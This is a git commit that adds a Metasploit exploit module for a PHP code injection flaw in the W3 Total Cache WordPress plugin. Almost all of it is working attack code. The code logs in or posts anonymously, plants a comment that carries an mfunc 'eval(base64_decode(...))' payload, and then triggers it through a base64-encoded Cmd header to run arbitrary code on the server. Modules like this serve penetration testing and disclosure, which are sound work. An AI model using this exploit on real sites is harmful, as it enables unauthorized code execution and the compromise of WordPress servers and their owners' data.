Add module for Wordpress Total Cache PHP Injection

jvazquez-r7 · jvazquez-r7 · commit d2e29b846cba · 2013-04-24T15:29:40.000-05:00
diff --git a/modules/exploits/unix/webapp/php_wordpress_total_cache.rb b/modules/exploits/unix/webapp/php_wordpress_total_cache.rb
@@ -0,0 +1,171 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Wordpress W3 Total Cache PHP Code Execution',
+			'Description'    => %q{
+					This module exploits a PHP Code Injection vulnerability on the W3 Total Cache
+				wordpress plugin up to and including 0.9.2.8 version. The exploit is due to the
+				handle of some special macros, such as mfunc, which allow to inject arbitrary PHP
+				code. A valid post id where publish the malicious comment must be provided. Also
+				credentials if anonymous comments are allowed. Finally, comments shouldn't be
+				moderated in order finish the exploitation successfully. This module has been tested
+				against Wordpress 3.5 and W3 Total Cache 0.9.2.3 on a Ubuntu 10.04 system.
+			},
+			'Author'	=>
+				[
+					'Unknown', # Vulnerability discovery
+					'juan vazquez' # Metasploit module
+				],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'OSVDB', '92652' ],
+					[ 'URL', 'http://www.acunetix.com/blog/web-security-zone/wp-plugins-remote-code-execution/' ]
+				],
+			'Privileged'     => false,
+			'Platform'       => ['php'],
+			'Arch'           => ARCH_PHP,
+			'Payload'        =>
+				{
+					'DisableNops' => true,
+				},
+			'Targets'        => [ ['Wordpress 3.5', {}] ],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Apr 17 2013'
+			))
+
+			register_options(
+				[
+					OptString.new('TARGETURI', [ true, "The base path to the wordpress application", "/wordpress/" ]),
+					OptInt.new('POSTID', [ true, "The post ID where publish the comment" ]),
+					OptString.new('USERNAME', [ false,  "The user to authenticate as (anonymous if username not provided)"]),
+					OptString.new('PASSWORD', [ false,  "The password to authenticate with (anonymous if password not provided)" ])
+				], self.class)
+	end
+
+	def peer
+		return "#{rhost}:#{rport}"
+	end
+
+	def require_auth?
+		@user = datastore['USERNAME']
+		@password = datastore['PASSWORD']
+
+		if @user and @password and not @user.empty? and not @password.empty?
+			return true
+		else
+			return false
+		end
+	end
+
+	def get_session_cookie(header)
+		header.split(";").each { |cookie|
+			cookie.split(" ").each { |word|
+				if word =~ /(.*logged_in.*)=(.*)/
+					return $1, $2
+				end
+			}
+		}
+		return nil, nil
+	end
+
+	def login
+		res = send_request_cgi(
+			{
+				'uri' => normalize_uri(target_uri.path, "wp-login.php"),
+				'method' => 'POST',
+				'vars_post' => {
+					'log' => @user,
+					'pwd' => @password
+				}
+			})
+
+		if res and res.code == 302 and res.headers['Set-Cookie']
+			return get_session_cookie(res.headers['Set-Cookie'])
+		else
+			return nil, nil
+		end
+
+	end
+
+	def post_comment
+		php_payload = "<!--mfunc eval(base64_decode($_SERVER[HTTP_CMD])); --><!--/mfunc-->"
+
+		vars_post = {
+			'comment' => php_payload,
+			'submit' => 'Post+Comment',
+			'comment_post_ID' => "#{datastore['POSTID']}",
+			'comment_parent' => "0"
+		}
+		vars_post.merge!({
+			'author' => rand_text_alpha(8),
+			'email' => "#{rand_text_alpha(3)}@#{rand_text_alpha(3)}.com",
+			'url' => rand_text_alpha(8),
+		}) unless @auth
+
+		options = {
+			'uri' => normalize_uri(target_uri.path, "wp-comments-post.php"),
+			'method' => 'POST'
+		}
+		options.merge!({'vars_post' => vars_post})
+		options.merge!({'cookie' => "#{@cookie_name}=#{@cookie_value}"}) if @auth
+
+		res = send_request_cgi(options)
+		if res and res.code == 302
+			location = URI(res.headers["Location"])
+			uri = location.path
+			uri << "?#{location.query}" unless location.query.nil? or location.query.empty?
+			return uri
+		else
+			return nil
+		end
+	end
+
+	def exploit
+
+		@auth = require_auth?
+
+		if @auth
+			print_status("#{peer} - Trying to login...")
+			@cookie_name, @cookie_value = login
+			if @cookie_name.nil? or @cookie_value.nil?
+				fail_with(Exploit::Failure::NoAccess, "#{peer} - Login wasn't successful")
+			end
+		else
+			print_status("#{peer} - Trying unauthenticated exploitation...")
+		end
+
+		print_status("#{peer} - Injecting the PHP Code throw a comment...")
+		post_uri = post_comment
+		if post_uri.nil?
+			fail_with(Exploit::Failure::Unknown, "#{peer} - Expected redirection not returned")
+		end
+
+		print_status("#{peer} - Executing the payload...")
+		options = {
+			'method' => 'GET',
+			'uri'    => post_uri,
+			'headers' => {
+				'Cmd' => Rex::Text.encode_base64(payload.encoded)
+			}
+		}
+		options.merge!({'cookie' => "#{@cookie_name}=#{@cookie_value}"}) if @auth
+		res = send_request_cgi(options)
+		if res and res.code == 301
+			fail_with(Exploit::Failure::Unknown, "#{peer} - Unexpected redirection, maybe comments are moderated")
+		end
+	end
+end
